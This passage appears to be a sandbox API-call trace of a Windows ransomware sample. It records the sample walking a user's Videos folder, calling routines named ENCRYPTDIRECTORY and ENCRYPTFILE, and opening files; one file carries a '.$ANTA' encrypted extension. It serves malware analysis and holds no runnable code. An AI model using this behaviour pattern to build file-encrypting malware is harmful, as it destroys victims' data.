dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.389] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.389] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.389] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3c4df4, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xa3c4df4, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xa4a9a15, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xcb40, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="yzzjzdDz73JlAs1uEFCr.avi.$ANTA", cAlternateFileName="YZZJZD~1.$AN")) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.389] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.389] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0104.389] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.389] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.390] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2900, ftCreationTime.dwHighDateTime=0x144e8e8, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2900, ftLastWriteTime.dwLowDateTime=0x43e95f0, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="", cAlternateFileName="ﺠмńဓ+\x10")) returned 0 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.390] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0104.390] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0104.390] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0104.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|yyOweBt9y9iUOOrJX", cchCount1=18, lpString2="", cchCount2=0) returned 3 [0104.391] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0104.391] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0104.391] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx")) returned 0x10 [0104.391] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\*", lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x788f5c40, ftCreationTime.dwHighDateTime=0x1d5e206, ftLastAccessTime.dwLowDateTime=0x89ee8070, ftLastAccessTime.dwHighDateTime=0x1d5f0ba, ftLastWriteTime.dwLowDateTime=0x89ee8070, ftLastWriteTime.dwHighDateTime=0x1d5f0ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caa00, cFileName=".", cAlternateFileName="")) returned 0x41ac700 [0104.391] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x788f5c40, ftCreationTime.dwHighDateTime=0x1d5e206, ftLastAccessTime.dwLowDateTime=0x89ee8070, ftLastAccessTime.dwHighDateTime=0x1d5f0ba, ftLastWriteTime.dwLowDateTime=0x89ee8070, ftLastWriteTime.dwHighDateTime=0x1d5f0ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caa00, cFileName="..", cAlternateFileName="")) returned 1 [0104.391] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ff8cb0, ftCreationTime.dwHighDateTime=0x1d5ea29, ftLastAccessTime.dwLowDateTime=0x24650cc0, ftLastAccessTime.dwHighDateTime=0x1d5e0f1, ftLastWriteTime.dwLowDateTime=0x24650cc0, ftLastWriteTime.dwHighDateTime=0x1d5e0f1, nFileSizeHigh=0x0, nFileSizeLow=0xd5f0, dwReserved0=0x0, dwReserved1=0x43caa00, cFileName="--f6foz.avi", cAlternateFileName="")) returned 1 [0104.391] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e7ec70, ftCreationTime.dwHighDateTime=0x1d5e673, ftLastAccessTime.dwLowDateTime=0xc6aa11d0, ftLastAccessTime.dwHighDateTime=0x1d5e969, ftLastWriteTime.dwLowDateTime=0xc6aa11d0, ftLastWriteTime.dwHighDateTime=0x1d5e969, nFileSizeHigh=0x0, nFileSizeLow=0xca0e, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="38VodG.mp4", cAlternateFileName="")) returned 1 [0104.391] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55aa7690, ftCreationTime.dwHighDateTime=0x1d5ea91, ftLastAccessTime.dwLowDateTime=0xd1eca410, ftLastAccessTime.dwHighDateTime=0x1d5f0d3, ftLastWriteTime.dwLowDateTime=0xd1eca410, ftLastWriteTime.dwHighDateTime=0x1d5f0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd0cb, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="C98TxuIy1khtVyZ_cTR.avi", cAlternateFileName="C98TXU~1.AVI")) returned 1 [0104.391] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc3fe2b0, ftCreationTime.dwHighDateTime=0x1d5e32d, ftLastAccessTime.dwLowDateTime=0xc02adcb0, ftLastAccessTime.dwHighDateTime=0x1d5ef34, ftLastWriteTime.dwLowDateTime=0xc02adcb0, ftLastWriteTime.dwHighDateTime=0x1d5ef34, nFileSizeHigh=0x0, nFileSizeLow=0x10d75, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Hf dn4y4LLHbc.swf", cAlternateFileName="HFDN4Y~1.SWF")) returned 1 [0104.391] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b76150, ftCreationTime.dwHighDateTime=0x1d5ec8d, ftLastAccessTime.dwLowDateTime=0x60d86c30, ftLastAccessTime.dwHighDateTime=0x1d5e5c2, ftLastWriteTime.dwLowDateTime=0x60d86c30, ftLastWriteTime.dwHighDateTime=0x1d5e5c2, nFileSizeHigh=0x0, nFileSizeLow=0x3394, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="jgIUi-yVs0307RW IcX.mkv", cAlternateFileName="JGIUI-~1.MKV")) returned 1 [0104.391] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd7fbae0, ftCreationTime.dwHighDateTime=0x1d5e2f4, ftLastAccessTime.dwLowDateTime=0x83865760, ftLastAccessTime.dwHighDateTime=0x1d5e9f0, ftLastWriteTime.dwLowDateTime=0x83865760, ftLastWriteTime.dwHighDateTime=0x1d5e9f0, nFileSizeHigh=0x0, nFileSizeLow=0x7644, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="kdyPGegxQAqdUuFtfW.mkv", cAlternateFileName="KDYPGE~1.MKV")) returned 1 [0104.391] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe830870, ftCreationTime.dwHighDateTime=0x1d5e515, ftLastAccessTime.dwLowDateTime=0xd21e2dd0, ftLastAccessTime.dwHighDateTime=0x1d5e24d, ftLastWriteTime.dwLowDateTime=0xd21e2dd0, ftLastWriteTime.dwHighDateTime=0x1d5e24d, nFileSizeHigh=0x0, nFileSizeLow=0xd19f, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="u5YsBEddaGYJI-.swf", cAlternateFileName="U5YSBE~1.SWF")) returned 1 [0104.391] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad61f30, ftCreationTime.dwHighDateTime=0x1d5eb2c, ftLastAccessTime.dwLowDateTime=0xc34a6b00, ftLastAccessTime.dwHighDateTime=0x1d5ea38, ftLastWriteTime.dwLowDateTime=0xc34a6b00, ftLastWriteTime.dwHighDateTime=0x1d5ea38, nFileSizeHigh=0x0, nFileSizeLow=0xbdbc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="vBQeWbI.swf", cAlternateFileName="")) returned 1 [0104.391] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2770, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x15, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3574, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="`мńဓ+\x10")) returned 0 [0104.392] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0104.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|--f6foz.avi|38VodG.mp4|C98TxuIy1khtVyZ_cTR.avi|Hf dn4y4LLHbc.swf|jgIUi-yVs0307RW IcX.mkv|kdyPGegxQAqdUuFtfW.mkv|u5YsBEddaGYJI-.swf|vBQeWbI.swf", cchCount1=143, lpString2="", cchCount2=0) returned 3 [0104.439] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0104.439] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\--f6foz.avi", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ff8cb0, ftCreationTime.dwHighDateTime=0x1d5ea29, ftLastAccessTime.dwLowDateTime=0x24650cc0, ftLastAccessTime.dwHighDateTime=0x1d5e0f1, ftLastWriteTime.dwLowDateTime=0x24650cc0, ftLastWriteTime.dwHighDateTime=0x1d5e0f1, nFileSizeHigh=0x0, nFileSizeLow=0xd5f0, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="--f6foz.avi", cAlternateFileName="")) returned 0x41ac040 [0104.439] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0104.439] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0104.439] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0104.439] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0104.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0104.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cac88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0104.440] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\--f6foz.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\--f6foz.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0104.440] FreeLibrary (hLibModule=0x772d0000) returned 1 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0104.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0104.441] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0104.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0104.441] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0104.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0104.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0104.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0104.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0104.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0104.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0104.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0104.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0104.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0104.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0104.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0104.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0104.442] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0104.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0104.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0104.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0104.443] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0104.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0104.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0104.443] CloseHandle (hObject=0x258) returned 1 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0104.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0104.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: 